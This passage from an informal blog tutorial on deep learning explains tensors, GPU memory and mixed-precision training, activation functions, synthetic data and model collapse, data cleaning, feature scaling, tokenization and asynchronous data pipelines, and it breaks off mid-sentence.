[{"content":"Intro This is an attempt to cover what I know about DL to some degree. Some stuff is very skippable, and I don\u0026rsquo;t really remember everything that I put in here, so there might be some repeating, but not much.\nThe Foundations of Deep Learning To understand how machine learning models work, you have to completely discard the idea that it \u0026ldquo;understands\u0026rdquo; anything. A model does not read text or see images. At the absolute lowest level, a neural network is just a massively complex sequence of mathematical operations executed on silicon. To feed data into that silicon, we must first translate reality into a format that a GPU’s compute cores can process. That translation layer is the tensor.\n1. Data Structures The input, model weights, training gradients, and final predictions are stored as tensors.\nTo understand what a tensor is, it is easiest to walk up the chain of dimensionality:\nScalar (0D): A single number. In code, this is just a standard integer or float (e.g., 5 or 3.14). It has magnitude, but no dimensions. Vector (1D): An array of numbers. Think of this as a single column or a single row of data. In memory, it is a sequence of scalars sitting next to each other. Matrix (2D): A grid of numbers with rows and columns. If you have ever used a spreadsheet, you were looking at a 2D matrix. Tensor (ND): A generalized, $n$-dimensional container for numerical data. Technically, scalars, vectors, and matrices are just 0D, 1D, and 2D tensors. However, in deep learning, the term \u0026ldquo;tensor\u0026rdquo; is used to refer to data with 3, 4, or 5+ dimensions. Memory Layout and Shapes The computer\u0026rsquo;s RAM and your GPU\u0026rsquo;s VRAM do not have three dimensions. Memory is strictly one-dimensional—it is a single, massively long line of physical addresses.\nSo, how does a GPU store a 3D or 4D tensor in a 1D memory space? It uses contiguous memory and a concept called strides.\nWhen a tensor is loaded into vRAM, the hardware lays out all the numbers in one flat, contiguous array. The \u0026ldquo;shape\u0026rdquo; of the tensor (e.g., telling the system it is a 3x3x3 grid) is actually just a tiny piece of metadata. This metadata specifies the strides, or the exact number of bytes, that the memory controller needs to skip forward in that 1D physical line to logically reach the \u0026ldquo;next\u0026rdquo; row or the \u0026ldquo;next\u0026rdquo; depth layer.\nThis physical reality dictates how we build and optimize models:\nCache Locality: Reading data linearly down the 1D memory line is blindingly fast because the CPU/GPU pulls in whole blocks of adjacent memory into its L1/L2 cache at once. If your math operations force the hardware to constantly jump around the 1D line (poor memory access patterns), your incredibly fast GPU will stall while waiting for data. Reshaping: In deep learning frameworks like TensorFlow or PyTorch, calling a .reshape() operation is usually instantaneous, because the framework doesn\u0026rsquo;t actually move any of the data in VRAM. It simply recalculates the stride metadata and leaves the 1D physical memory unchanged. Tensors in Practice If you want to train a Convolutional Neural Network (CNN) to recognize dogs, you don\u0026rsquo;t feed it one image at a time. 
To keep the GPU\u0026rsquo;s thousands of cores fully saturated, you feed it a \u0026ldquo;batch\u0026rdquo; of images simultaneously.\nThe standard tensor shape for an image batch in deep learning is Batch Size, Height, Width, and Color Channels.\nBatch Size: You are processing 32 images at once. Height: Each image is 256 pixels tall. Width: Each image is 256 pixels wide. Color Channels: Using RGB encoding, you need 3 color values to represent a color. So, the input tensor has the shape [32, 256, 256, 3]\nThe tensor\u0026rsquo;s shape determines how much memory is used. The tensor used as an example contains 6,291,456 individual numbers. If you are using standard 32-bit floating-point precision, this single input tensor takes up roughly 25 Megabytes of contiguous physical vRAM before the model has even done a single mathematical operation.\n2. The Hardware Engine Running inference on a model requires enough vRAM to hold the model weights and the context. Training a model is vastly more demanding because the hardware must maintain the state of the entire learning process.\nTraining Memory Cost During inference, data passes through the neural network, generates an output, and the intermediate calculations are discarded. During training, discarding that data is impossible. Training requires storing four separate components in vRAM simultaneously:\nModel Weights: The actual parameters of the neural network. Activations: The output of every single hidden layer during the forward pass. These must be kept in vRAM because the backpropagation algorithm needs them to calculate the gradients later. Gradients: The calculated error values for every single parameter, telling the model how to adjust. Optimizer States: Modern optimizers like Adam do not just update weights blindly. Adam keeps track of the momentum (moving average of the gradient) and variance (moving average of the squared gradient) for every single parameter. This means a model that requires 4GB of VRAM to run might easily require 16GB to 24GB to train.\nCompute The core operation of a neural network is the Matrix Multiply-Accumulate (MMA). The hardware must multiply an input by a weight and add a bias. Modern GPUs handle this using specialized hardware called Tensor Cores, which can execute a 4x4 matrix MMA operation in a single clock cycle, as discussed in the AI Stack post.\nTo maximize the speed of these Tensor Cores and reduce the memory bandwidth bottleneck, training utilizes Mixed Precision.\nStandard precision uses 32-bit floating-point numbers (FP32). Mixed precision drops the compute operations down to 16-bit (FP16 or BF16). This halves the vRAM requirement for activations and doubles the memory bandwidth, allowing the Tensor Cores to process data twice as fast.\nHowever, gradients (the weight updates) are often extremely small numbers. If you apply a tiny update, like 0.0000001, to an FP16 number, the hardware lacks the precision to represent it, and it rounds to zero. This is called numerical underflow. To prevent this, mixed-precision training keeps a \u0026ldquo;master copy\u0026rdquo; of all weights in FP32. The hardware calculates the gradients quickly in 16-bit, casts them up to 32-bit to safely update the master weights, and then casts the updated weights back down to 16-bit for the next pass.\nThe CPU and PCIe/memory Bottleneck The GPU is the compute engine, but the CPU acts as the fuel pump. 
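Before moving on to that pipeline: the shape, stride, and memory arithmetic above is easy to check directly. A minimal sketch, assuming PyTorch (any framework with strided tensors behaves the same way):

```python
import torch

# The example batch: 32 RGB images, 256x256, channels-last layout.
batch = torch.randn(32, 256, 256, 3, dtype=torch.float32)

print(batch.shape)    # torch.Size([32, 256, 256, 3])
print(batch.numel())  # 6,291,456 individual numbers
print(batch.numel() * batch.element_size())  # 25,165,824 bytes, roughly 25 MB

# Strides: how many elements to skip in the flat 1D buffer to move one
# logical step along each dimension.
print(batch.stride())  # (196608, 768, 3, 1)

# Reshaping only rewrites that metadata; the flat buffer is untouched.
flat = batch.reshape(32, -1)
print(flat.shape)                           # torch.Size([32, 196608])
print(flat.data_ptr() == batch.data_ptr())  # True: same underlying memory
```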
If the pipeline feeding the GPU breaks down, the GPU sits idle.\nBefore a GPU can perform a single matrix multiplication, the CPU must:\nFetch the raw data from the SSD or NVMe drive. Decode the data (e.g., converting compressed JPEG files into raw pixel arrays). Apply any preprocessing or data augmentation. Bundle the data into the correct tensor shapes. Push that batch of tensors across the motherboard\u0026rsquo;s PCIe lanes and into the GPU\u0026rsquo;s VRAM. If your CPU is too slow to decode the data, or you do not have enough PCIe bandwidth, the GPU will process a batch of data in 10 milliseconds and then spend 50 milliseconds doing absolutely nothing while waiting for the next batch to arrive. This is called GPU starvation. When building a deep learning setup, the speed of the storage, the number of CPU cores handling the data pipeline, and the memory bandwidth dictate the actual training speed just as much as the GPU itself.\n3. The Anatomy of a Neural Network If the tensor is the data format and the GPU is the engine, the neural network architecture is the physical wiring. At its absolute core, a neural network is just a mechanism for finding patterns in numbers, and it does this through a staggering volume of very simple arithmetic.\nThe Artificial Neuron (Perceptron) To understand a multi-billion parameter model, you have to look at the smallest functional unit: the artificial neuron. When a GPU processes data through a neuron, it is executing a single, foundational mathematical equation: $y = f(\\mathbf{w} \\cdot \\mathbf{x} + b)$\n$\\mathbf{x}$: The inputs. This is a vector of numbers, either coming from your raw data (e.g., pixel values) or from the previous layer of the network. $\\mathbf{w}$: The weights. This is a vector of parameters the model actually learns. Each weight acts as a volume knob, determining how much \u0026ldquo;importance\u0026rdquo; to assign to its corresponding input. $\\mathbf{w} \\cdot \\mathbf{x}$: The dot product. The GPU multiplies each input by its corresponding weight and sums them together to produce a single number. This is the Matrix Multiply-Accumulate (MMA) operation discussed in the hardware section. $b$: The bias. After the dot product is calculated, a single scalar value is added to the result. Why the Bias Exists Bias fixes the issue of the neuron\u0026rsquo;s output being strictly tied to the input. If all inputs in $\\mathbf{x}$ are 0, the output must be 0, effectively anchoring the logic to the origin point of a graph. Bias allows the network to shift the activation threshold left or right, independently of the input data, giving the model the flexibility to fit patterns that do not pass through zero.\nNOTE: There is more to bias, but not that important, so I removed it\nFrom Neurons to Layers A single neuron is useless for complex tasks. To build a network, we stack hundreds or thousands of these neurons side-by-side to create a layer.\nWhen we do this, the math naturally scales from vector operations to matrix operations. Instead of calculating a dot product for a single neuron, the GPU takes an entire matrix of inputs and multiplies it by an entire matrix of weights for the entire layer simultaneously. 
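As a quick sketch of what "the entire layer simultaneously" means in code, here is one dense layer applied to a whole batch with a single matrix multiply; the sizes are made up for illustration:

```python
import numpy as np

batch_size, n_inputs, n_neurons = 32, 784, 128

X = np.random.randn(batch_size, n_inputs)  # a batch of flattened inputs
W = np.random.randn(n_inputs, n_neurons)   # one weight per input, per neuron
b = np.random.randn(n_neurons)             # one bias per neuron

# Every neuron's dot product, for every sample in the batch, in one operation.
Z = X @ W + b
print(Z.shape)  # (32, 128)
```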
This is why AI requires GPUs: a CPU would calculate these neurons sequentially, while a GPU’s specialized cores calculate the entire matrix multiplication across the entire layer in a single clock cycle.\nArchitecture When you string these layers together, you get the standard deep learning architecture:\nInput Layer: Not actually a layer of computing neurons. It is just the raw tensor format of your incoming data. Hidden Layers: The core of the network. They are \u0026ldquo;hidden\u0026rdquo; because you do not dictate what these layers learn. You feed data in one end and check the prediction at the other. The network automatically configures the weights in these intermediate layers to represent features (e.g., the first hidden layer learns to find edges, the second learns shapes, the third learns faces). Output Layer: The final set of neurons that maps the high-level feature representations back down to the specific prediction format you want (e.g., a single probability score for a binary classification). 4. Activation Functions: Forcing Non-Linearity In the neuron equation $y = f(\\mathbf{w} \\cdot \\mathbf{x} + b)$ the math inside the function has been covered; it\u0026rsquo;s matrix multiplication, but the function that gets passed that data is variable.\nLinear The dot product and bias addition are strictly linear operations. Here is a fundamental mathematical reality: a linear combination of linear functions is just another linear function.\nIf you stack 100 hidden layers together, but only use the math $\\mathbf{w} \\cdot \\mathbf{x} + b$ those 100 layers collapse, and the result is identical to a single layer. A purely linear network can only draw a straight line through data. To learn complex, curving, real-world patterns, we have to bend the math. We must inject nonlinearity into the system so that a layer\u0026rsquo;s output is not just a scaled version of its input.\nReLU (Rectified Linear Unit) ReLU is one of the most commonly used activation functions for hidden layers. The equation is incredibly simple: $$f(x) = \\max(0, x)$$ NOTE: If the input is positive, it passes through unchanged. If it is negative, it becomes zero.\nWhy is this so popular? Hardware efficiency. To compute complex curves such as exponentials or sines, the GPU has to spend multiple clock cycles. To compute ReLU, the GPU simply checks the sign bit of the floating-point number in memory. If the sign bit indicates a negative, it zeros it out. It is computationally nearly free. By simply clipping all negative values to zero, ReLU provides sufficient non-linearity for the network to map highly complex boundaries without slowing the training loop.\nSigmoid and Tanh Before ReLU, networks relied on functions like Sigmoid and Tanh. Sigmoid maps any input to a value between 0 and 1: $$f(x) = \\frac{1}{1 + e^{-x}}$$Tanh is mathematically similar but maps inputs to a range between -1 and 1. $$\\tanh(x) = \\frac{e^x - e^{-x}}{e^x + e^{-x}}$$These functions are fantastic for output layers. If you are building a model to predict whether an image is a dog or a cat, putting a Sigmoid function on the final neuron guarantees the output will be a clean probability score (e.g., 0.85, or 85% dog).\nHowever, they are terrible for hidden layers in deep networks because of a hardware and calculus issue called the vanishing gradient problem. Look at the math for Sigmoid: if you feed it a large positive number (like 10) or a large negative number (like -10), the output flatlines at 1 or 0. The curve becomes completely horizontal. 
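A minimal sketch of that flattening, using the standard derivative of the sigmoid, $\sigma'(x) = \sigma(x)(1 - \sigma(x))$:

```python
import numpy as np

def sigmoid(x):
    return 1.0 / (1.0 + np.exp(-x))

for x in [0.0, 2.0, 5.0, 10.0]:
    s = sigmoid(x)
    slope = s * (1.0 - s)  # derivative of the sigmoid at x
    print(f"x={x:5.1f}  sigmoid={s:.8f}  slope={slope:.8f}")

# x=  0.0  sigmoid=0.50000000  slope=0.25000000
# x= 10.0  sigmoid=0.99995460  slope=0.00004540
# ReLU, by contrast, has slope exactly 1 for any positive input.
```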
When the backpropagation algorithm tries to calculate the gradient (the slope) on a horizontal line, the gradient is effectively zero. If the gradient is zero, the optimizer cannot update the weights, and the network permanently stops learning.\nThe Data Engine If you feed a highly optimized, mixed-precision GPU pipeline with garbage data, it will just learn to predict garbage with incredible efficiency. The mathematical mechanics of deep learning are completely blind; they will optimize for whatever patterns exist in the dataset, including corrupted files and systemic biases (all the fun stuff).\n1. Data Acquisition: Sourcing the Raw Fuel Before a tensor can be loaded into VRAM, the numbers have to come from somewhere. Sourcing data for deep learning is a difficult task due to how much is needed and most data at that scale is not clean or in the format that is needed for the training process.\nPublic Datasets A command like load_dataset(\u0026quot;mnist\u0026quot;) from a public repository like Kaggle, the UCI Machine Learning Repository, or HuggingFace, you instantly receive perfectly aligned, mathematically normalized matrices ready for training. This is nice if you are building a model related to those datasets. Public datasets represent solved data entropy problems. They have already been aggressively filtered, balanced, and cleaned. Relying exclusively on pre-packaged CSVs or NumPy arrays skips the hardest physical and logical barrier in building a model: forcing unstructured, real-world data into a structured tensor.\nScraping and APIs The raw fuel for custom models—whether predicting market trends or classifying niche industrial components—must be extracted from the wild. This means pulling data via REST APIs or scraping raw HTML. Long before backpropagation or loss functions enter the equation, the data ingestion pipeline must handle severe infrastructural hurdles:\nRate Limits and Backoff: You cannot pull a million JSON records simultaneously without hitting HTTP 429 (Too Many Requests) errors. Acquisition scripts require exponential backoff logic to trickle data onto local storage without overloading the host server or getting the requesting IP banned. Pagination and State: When extracting large datasets over unstable network connections, scripts can crash. If a connection drops on page 50,000 of an API response, the pipeline needs state management to know exactly where it left off, preventing duplicate data ingestion or massive gaps in the dataset. Schema Mutations: The JSON schema received on day one of an extraction might not match the schema on day five. Fields disappear, data types silently change from integers to strings, and nested arrays get corrupted. The ingestion pipeline must catch these mutations, flatten nested JSON or HTML DOM trees, and serialize them into a unified, predictable format on disk before mathematical preprocessing can even begin.\nSynthetic Data Generation When enough raw data can\u0026rsquo;t be scraped, or when specific edge cases are too rare in the wild, the modern approach is synthetic data. This involves using a large, powerful model to generate training data for a smaller, specialized architecture.\nFor example, a 70B parameter Large Language Model (LLM) might generate thousands of highly complex, correctly formatted SQL queries to train a tiny 3B parameter model to do nothing but write SQL. 
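Circling back to the acquisition hurdles above, here is a hedged sketch of exponential backoff with resumable pagination state. The endpoint URL, the state file, and the page layout are all hypothetical placeholders, not a real API:

```python
import json
import time
from pathlib import Path

import requests

API_URL = "https://api.example.com/records"  # placeholder endpoint
STATE_FILE = Path("scrape_state.json")       # remembers where we left off
Path("raw").mkdir(exist_ok=True)

def fetch_page(page: int, max_retries: int = 6) -> dict:
    delay = 1.0
    for _ in range(max_retries):
        resp = requests.get(API_URL, params={"page": page}, timeout=30)
        if resp.status_code == 429:  # rate limited: back off and retry
            time.sleep(delay)
            delay *= 2               # exponential backoff
            continue
        resp.raise_for_status()
        return resp.json()
    raise RuntimeError(f"Gave up on page {page} after {max_retries} retries")

# Resume from the last completed page if a previous run crashed.
start = json.loads(STATE_FILE.read_text())["next_page"] if STATE_FILE.exists() else 0

for page in range(start, start + 1000):
    records = fetch_page(page)
    Path(f"raw/page_{page:08d}.json").write_text(json.dumps(records))
    STATE_FILE.write_text(json.dumps({"next_page": page + 1}))  # checkpoint progress
```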
In computer vision, a diffusion model might generate thousands of images of defective factory parts to train a standard Convolutional Neural Network (CNN) to detect those specific anomalies on an assembly line.\nHowever, relying on synthetic data introduces a fatal mathematical risk known as Model Collapse.\nModel Collapse Neural networks are probabilistic engines. They are trained to map the distribution of their training data, and when they generate output, they inherently favor the most probable patterns (the center of the bell curve) while occasionally missing the rare edge cases (the tails of the distribution).\nModel collapse is a degenerative process where iterative training on self-generated data leads to a gradual decline in performance.\nIterative Collapse: If Model B is trained entirely on data generated by Model A, Model B only learns the high-probability patterns that Model A produced. The variance in the data shrinks. If Model B is then used to generate data to train Model C, the variance shrinks again. Mathematically, the original, messy diversity of the true data distribution is gradually erased, and the test error accumulates infinitely over each generation ($n$) according to the equation $E_{test} = \\frac{\\sigma^{2}d}{T-d-1} \\times n$. Within a few generations, the probability distribution collapses into a narrow spike. The model forgets how to handle edge cases, its outputs become highly repetitive, and its generalization capabilities are permanently degraded. Non-Iterative Collapse: You cannot bypass this simply by mixing pure synthetic data with human data during a fresh pre-training run. There is a direct, negative correlation between the proportion of pure synthetic data in your pipeline and the final performance of the model. When training from scratch, purely synthetic data does not benefit the model and physically hinders its learning process. Diagnosing the Failure: Why Synthetic Data Fails When we inspect the raw tensors, pure synthetic data fails for two strict mathematical reasons:\nCoverage Narrowing (Killing the Long Tail): Human data is chaotic; it possesses a sharp peak and a massive \u0026ldquo;long tail\u0026rdquo; of highly diverse, rare structural features. Synthetic data completely amputates this tail. Language models default to generating \u0026ldquo;safe,\u0026rdquo; highly probable text. When measured, synthetic data is violently compressed into a narrow fraction of the true distribution, exhibiting a perplexity range confined to [0, 14], compared to the human data range spanning from 0 to over 100. The GPU never sees the mathematical edge cases required to generalize. Feature Over-Concentration: Because synthetic data plays it safe, it severely overuses specific n-gram features. If you hash the bi-grams of synthetic text, you will find massive, unnatural spikes in specific word combinations compared to the broad, scattered response of human text. Semi-Synthetic Data To safely scale your datasets without triggering model collapse, you must abandon generating pure synthetic data from scratch. Instead, you must use real human data as an anchor to preserve the primary human-produced data distribution, and apply Token-Level Editing to create \u0026ldquo;semi-synthetic\u0026rdquo; data.\nHere is the mechanical execution:\nThe Prior Inference: You pass a real human sentence through a frozen, pre-trained language model (the prior). Targeting the U-Shape: You ask the prior to calculate the conditional probability of every single token in the sequence. 
Surgical Resampling: If a token\u0026rsquo;s predicted probability is incredibly high (exceeding a strict threshold, like $p \\ge 0.99$), it means the token is mathematically \u0026ldquo;easy\u0026rdquo; and offers almost zero learning value to the optimizer. You instruct the script to violently drop that original token and resample a new one from the distribution. If the token is mathematically complex (low-probability), leave it completely untouched. By only rewriting the highly predictable tokens and leaving the complex structures intact, you inject fresh variability into the dataset while physically preserving the human long-tail manifold. Most importantly, this semi-synthetic editing mathematically bounds the test error to a finite limit ($E_{test} \\le \\frac{2\\sigma^{2}d}{T-d-1}$), completely halting the infinite error accumulation and preventing model collapse.\nNOTE: This applies to more then just human language but also to any other form of data. By implementing this change on the data, you are able to get more out of the data you have.\n2. Preprocessing Raw data is rarely ready to be computed. A neural network is a strict mathematical engine; it does not possess the common sense to ignore a blank cell or understand that a sensor glitched and recorded an impossible value. If you load raw, uncleaned data into VRAM, the math will execute exactly as instructed, which usually results in the immediate destruction of the model\u0026rsquo;s weights.\nThe Danger of Missing Values In a standard spreadsheet, a missing value is just an empty box. In a database, it is a NULL. But when data is serialized into a tensor for a GPU, missing values are cast as NaN (Not a Number) according to the IEEE 754 floating-point standard.\nThis introduces a catastrophic mathematical virus into your hardware known as NaN poisoning. The core rule of floating-point math is that any operation involving a NaN evaluates to NaN.\n$5 + \\text{NaN} = \\text{NaN}$ $\\text{NaN} \\times 0 = \\text{NaN}$ If a single NaN value slips into a batch of 10,000 inputs, here is the exact physical chain reaction that occurs during that training step:\nForward Pass: The NaN input is multiplied by the weights in the first hidden layer. Those specific activations become NaN. In the next layer, those NaN activations are multiplied by additional weights, spreading the NaN across the entire layer. By the time the data reaches the output layer, the final prediction is NaN. Loss Calculation: The inference engine compares the NaN prediction to the true label. The resulting error (loss) is calculated as NaN. Backpropagation: The calculus engine attempts to find the gradient of NaN. The resulting gradients for every single parameter in the network become NaN Optimizer Update: The optimizer takes the current, healthy model weights and adds the NaN gradients to them. In a fraction of a second, the entire multibillion-parameter weight matrix is overwritten with NaNs. The model is irreversibly destroyed, and training must be completely restarted from the last saved checkpoint.\nThis is very bad. It has happened on several occasions\nImputation Strategies To prevent NaN poisoning, missing values must be aggressively scrubbed before tensor conversion. If a row has too many missing values, dropping it entirely is the safest option. But if you cannot afford to lose the data, you must perform imputation—mathematically guessing the missing number.\nMean/Median Imputation: The fastest hardware approach. 
You calculate the average or the middle value of that specific feature across the dataset and plug it into the blank spaces. While computationally cheap, this is mathematically dangerous. It artificially reduces the variance of your dataset and creates a massive, unnatural spike in your data distribution directly at the mean, which the neural network will inevitably overfit to. Predictive Imputation: A much safer, though computationally expensive, route. Instead of using a blind average, you use a smaller algorithm (like K-Nearest Neighbors) to analyze the other features in that specific row and predict what the missing value likely was. This preserves the dataset\u0026rsquo;s statistical relationships and variance, keeping the data distribution natural for the final model. Outliers and Heavy Tails Neural networks learn by making mistakes and calculating the error (the gradient). That gradient dictates how aggressively the optimizer updates the weights.\nImagine a dataset of house prices with a normal range of $100,000 to $500,000. Due to a scraping error, one house is listed at $999,000,000.\nDuring the forward pass, the model predicts $300,000. The loss function (usually Mean Squared Error for regression) computes the squared difference between the prediction and the anomaly. The resulting error signal is massive.\nWhen backpropagation calculates the gradient from this massive error, the resulting weight update is so violent that it completely overwrites the fine-tuned adjustments the model made over the last hundred batches. The optimizer gets thrown completely out of the local minimum it was settling into. Extreme anomalies ruin gradient descent.\nTo fix this, the data must be capped or clipped (a process sometimes called Winsorization). Before the data ever hits the GPU, a script analyzes the distribution and establishes hard ceilings and floors, for example, at the 1st and 99th percentiles. Any value above the 99th percentile is simply rewritten to exactly match the 99th percentile value. This ensures that, while the model still sees a \u0026ldquo;high\u0026rdquo; value, the resulting gradient is physically constrained from producing a catastrophic error signal that could destroy the optimizer\u0026rsquo;s progress.\n3. Feature Scaling If you do not scale your data, you are actively fighting the mathematics of optimization. Neural networks are entirely blind to the physical units of your dataset. They only see raw magnitude. The topography of the loss landscape, the mathematical terrain the optimizer must navigate to find the lowest error, is entirely dictated by the scale of your features.\nThe Problem of Uneven Features Consider a dataset with two inputs: Feature A (number of rooms), ranging from 1 to 5, and Feature B (house price), ranging from $100,000 to $1,000,000.\nDuring the forward pass ($\\mathbf{w} \\cdot \\mathbf{x}$), the massive raw values of Feature B will output huge numbers. Because the numbers are so large, even a microscopic adjustment to the weight of Feature B will cause a massive swing in the final loss calculation. Conversely, changing the weight of Feature A will barely register.\nWhen the backpropagation algorithm computes the gradients, those for Feature B will completely dominate. 
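A minimal sketch of that imbalance with made-up numbers; nudging each weight by the same tiny amount produces wildly different output swings:

```python
import numpy as np

# Feature A: number of rooms (1-5). Feature B: price (100k-1M). Values made up.
X = np.array([[3.0, 250_000.0],
              [2.0, 180_000.0],
              [5.0, 900_000.0]])
w = np.array([0.5, 0.5])  # start with equal weights

print(X @ w)  # [125001.5  90001.  450002.5] - the rooms column barely registers

# Nudge each weight by the same 0.01 and watch the outputs move.
print(X @ (w + np.array([0.01, 0.0])))  # rooms weight: outputs shift by ~0.03
print(X @ (w + np.array([0.0, 0.01])))  # price weight: outputs shift by thousands
```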
The loss landscape physically distorts from a clean, symmetrical bowl into an elongated, narrow ravine.\nWhen the optimizer attempts to descend this ravine, it bounces erratically against the steep walls created by Feature B, struggling to make any forward progress along the shallow axis of Feature A. To prevent the model from exploding out of the ravine entirely, you are forced to set an incredibly small learning rate, meaning the network will take an eternity to train.\nNormalization Normalization (specifically Min-Max Scaling) fixes this distortion by compressing the raw data into a strict 0 to 1 range.\nThe math is a straightforward linear transformation: $x_{norm} = \\frac{x - x_{min}}{x_{max} - x_{min}}$\nThe hardware takes the data point, subtracts the absolute minimum value in the dataset, and divides it by the total range. This forces the lowest value to perfectly equal 0, and the highest value to perfectly equal 1.\nThis technique is essential when the physical boundaries of the data are strictly known and fixed. The classic use case is computer vision. A standard 8-bit image pixel strictly ranges from 0 to 255. By dividing the entire image tensor by 255, you mathematically perfectly normalize the data to a 0 to 1 range, instantly stabilizing the dot products in the first layer of your Convolutional Neural Network without losing any spatial relationships.\nStandardization Standardization (or Z-Score scaling) takes a different mathematical approach. Instead of forcing data into a hard box, it centers the data around a mean of 0 with a standard deviation of 1.\nThe math: $z = \\frac{x - \\mu}{\\sigma}$\nThe hardware subtracts the feature\u0026rsquo;s mean ($\\mu$) from the data point, and divides it by the feature\u0026rsquo;s standard deviation ($\\sigma$).\nStandardization is generally preferred over Min-Max scaling for deep learning for two core reasons. First, it is highly resilient to anomalies. If Min-Max scaling encounters a single massive outlier, $x_{max}$ becomes huge, and the rest of your normal data gets crushed into a tiny fraction of the 0 to 1 range. Standardization does not have a hard ceiling, so an outlier remains an outlier without destroying the distribution of the healthy data.\nSecond, it centers the data exactly at zero.\nWhen input tensors hover symmetrically around zero, the initial dot products in the hidden layers also hover around zero. This keeps the network\u0026rsquo;s values safely within the optimal, non-saturated operating ranges of activation functions, preventing gradients from vanishing or exploding early in the training loop.\n4. Modality-Specific Formatting A GPU cannot ingest a file from your hard drive. It can only execute matrix multiplication on raw numbers. Before any training can begin, the physical files representing your data must be mechanically translated into the strict mathematical tensor format the hardware expects.\nVision (Images) An image on disk is not a matrix of numbers; it is a highly compressed byte stream.\nDecoding Formats: When you load a JPEG or PNG, the CPU must first decompress the file. A JPEG relies on the Discrete Cosine Transform (DCT) to compress data. The CPU must execute an inverse DCT to reconstruct the data into a raw, uncompressed 3D array of red, green, and blue (RGB) pixel intensities ranging from 0 to 255. Resizing and Interpolation: Neural network architectures require strict, fixed input shapes. 
If your first Convolutional layer expects a [256, 256, 3] tensor, but your decoded image is [1920, 1080, 3], the CPU must physically shrink the array. This is not accomplished by simply dropping pixels, which would destroy spatial relationships. Instead, it uses interpolation math. Bilinear interpolation, for example, looks at the four nearest known pixels in the original high-resolution grid, calculates their weighted average based on physical distance, and uses that resulting fraction to synthesize a completely new pixel for the smaller 256x256 grid. Data Augmentation: Deep learning models are incredibly prone to memorization. A GPU can memorize the exact pixel values of 10,000 images in minutes (overfitting). The cheapest, most effective way to prevent this is data augmentation: mathematically mutating the tensors on the CPU before they are sent across the PCIe bus to the GPU. Rotating: Multiplying the image tensor by a 2D rotation matrix. Flipping: Reversing the index order of the array along the X or Y axis. Cropping: Slicing a random [224, 224, 3] subset tensor out of the larger [256, 256, 3] tensor. By applying these random mathematical transformations to every batch, the GPU never sees the exact same numerical grid twice. It is physically forced to learn the underlying shapes and edges rather than memorize static pixel values.\nText (Tokenization Basics) GPUs do not understand strings. A word is just a sequence of ASCII or UTF-8 characters, which are useless for neural network arithmetic. To process text, the strings must be mapped to a fixed vocabulary of integers.\nBridging the Gap: Tokenization is the process of chopping a string into smaller chunks and assigning each chunk a unique integer ID. If you map at the word level, your vocabulary becomes impossibly large (millions of IDs), causing memory bloat. If you map at the character level, the model loses the semantic meaning of the words. Byte Pair Encoding (BPE): The modern standard is sub-word tokenization. Algorithms like BPE scan the entire training corpus to identify the most mathematically frequent byte sequences. Common words like \u0026ldquo;the\u0026rdquo; get a single ID. Less common words get broken down into highly frequent sub-components. For example, the word \u0026ldquo;highest\u0026rdquo; might be split into the root \u0026ldquo;high\u0026rdquo; (ID: 402) and the suffix \u0026ldquo;est\u0026rdquo; (ID: 88). The Final Tensor: After the tokenizer runs, a sentence is entirely stripped of text. \u0026ldquo;Deep learning is fast\u0026rdquo; becomes a simple 1D tensor of integers: [8452, 312, 64, 1102]. These integers are then used by the hardware as direct lookup indices to pull the corresponding dense weight vectors from the model\u0026rsquo;s embedding matrix. Model takes input. Converts to a language it understands and can run on a GPU. That is the takeaway here.\n5. The Data Pipeline As established in the hardware breakdown, the GPU is a mathematically ravenous engine, and the CPU is the fuel pump. If the pipeline feeding the GPU fails, the GPU\u0026rsquo;s massive compute capability is entirely wasted. Building a deep learning data pipeline is an exercise in managing physical bottlenecks.\nThe Impossibility of RAM In standard software development, you typically load a file into memory, process it, and output a result. In deep learning, doing this will instantly crash your machine.\nModern datasets are massive. A modest image dataset or a large text corpus can easily exceed 500GB. 
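A dataset that size cannot be loaded up front; the paragraphs below explain lazy loading, memory mapping, and asynchronous prefetching, and this is roughly what they look like in practice, assuming PyTorch's Dataset/DataLoader API, with hypothetical file paths and a stubbed-out decode step:

```python
from pathlib import Path

import torch
from torch.utils.data import DataLoader, Dataset

class LazyImageDataset(Dataset):
    def __init__(self, root: str):
        # Only the lightweight list of paths lives in RAM, never the pixels.
        self.paths = sorted(Path(root).glob("*.jpg"))

    def __len__(self) -> int:
        return len(self.paths)

    def __getitem__(self, idx: int) -> torch.Tensor:
        # Decode exactly one image, only when a batch actually needs it.
        # (Decoding and augmentation would happen here; stubbed as random pixels.)
        return torch.rand(3, 256, 256)

loader = DataLoader(
    LazyImageDataset("data/train"),  # hypothetical path
    batch_size=32,
    shuffle=True,
    num_workers=4,      # background CPU workers prepare batch N+1
    pin_memory=True,    # page-locked RAM so the GPU can DMA the batch
    prefetch_factor=2,  # each worker keeps two batches staged ahead
)

for batch in loader:
    pass  # each batch arrives as [32, 3, 256, 256], ready to move to the GPU
```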
Standard system RAM typically caps out between 64GB and 256GB. If you attempt to load the entire dataset into memory at the start of your script, the operating system will immediately exhaust physical RAM and begin paging data to the hard drive\u0026rsquo;s swap file. This brings the entire system to a grinding halt before throwing an Out of Memory (OOM) kill signal. The data must be physically managed.\nLazy Loading and Memory Mapping The solution to the RAM bottleneck is lazy loading. Instead of reading the files, the script merely loads a lightweight list of file paths or byte offsets into RAM. The CPU only reads the specific physical data required for the exact batch it is about to process.\nTo do this efficiently, the pipeline relies on memory mapping. This is an operating system-level trick that maps a file on the NVMe SSD directly to the application\u0026rsquo;s virtual address space. Instead of using slow, standard file I/O operations to copy data from disk into a RAM buffer, the OS pages raw chunks of the file into RAM only when the CPU requests those specific addresses. This minimizes overhead and keeps the memory footprint strictly limited to the current batch size.\nAsynchronous Prefetching Even with lazy loading, a naive pipeline will cause severe hardware starvation.\nIn a synchronous loop, the execution looks like this:\nThe CPU fetches the batch $N$ from the SSD. The CPU decodes and augments the data. The CPU pushes the tensor across the PCIe bus. The GPU executes the Matrix Multiplications for Batch $N$. The system waits for the GPU to finish. The CPU finally begins fetching the batch $N+1$. During steps 1, 2, and 3, the GPU is doing absolutely nothing. If you look at your hardware monitor, your GPU utilization will look like an erratic heartbeat spiking to 100% for a fraction of a second, then crashing to 0% while it waits for the CPU to prepare the next batch.\nTo achieve a flatline of 100% GPU utilization, the pipeline must be asynchronous. You must instruct the framework to spin up background CPU threads. While the GPU is actively crushing the Matrix Multiplications for the batch $N$, the CPU is simultaneously fetching, decoding, and augmenting the Batch $N+1$.\nThe CPU then places this prepared batch into pinned memory (page-locked RAM). Pinned memory allows the GPU to use Direct Memory Access (DMA) to pull the data directly across the PCIe lanes without the CPU having to actively manage the transfer. The exact microsecond the GPU 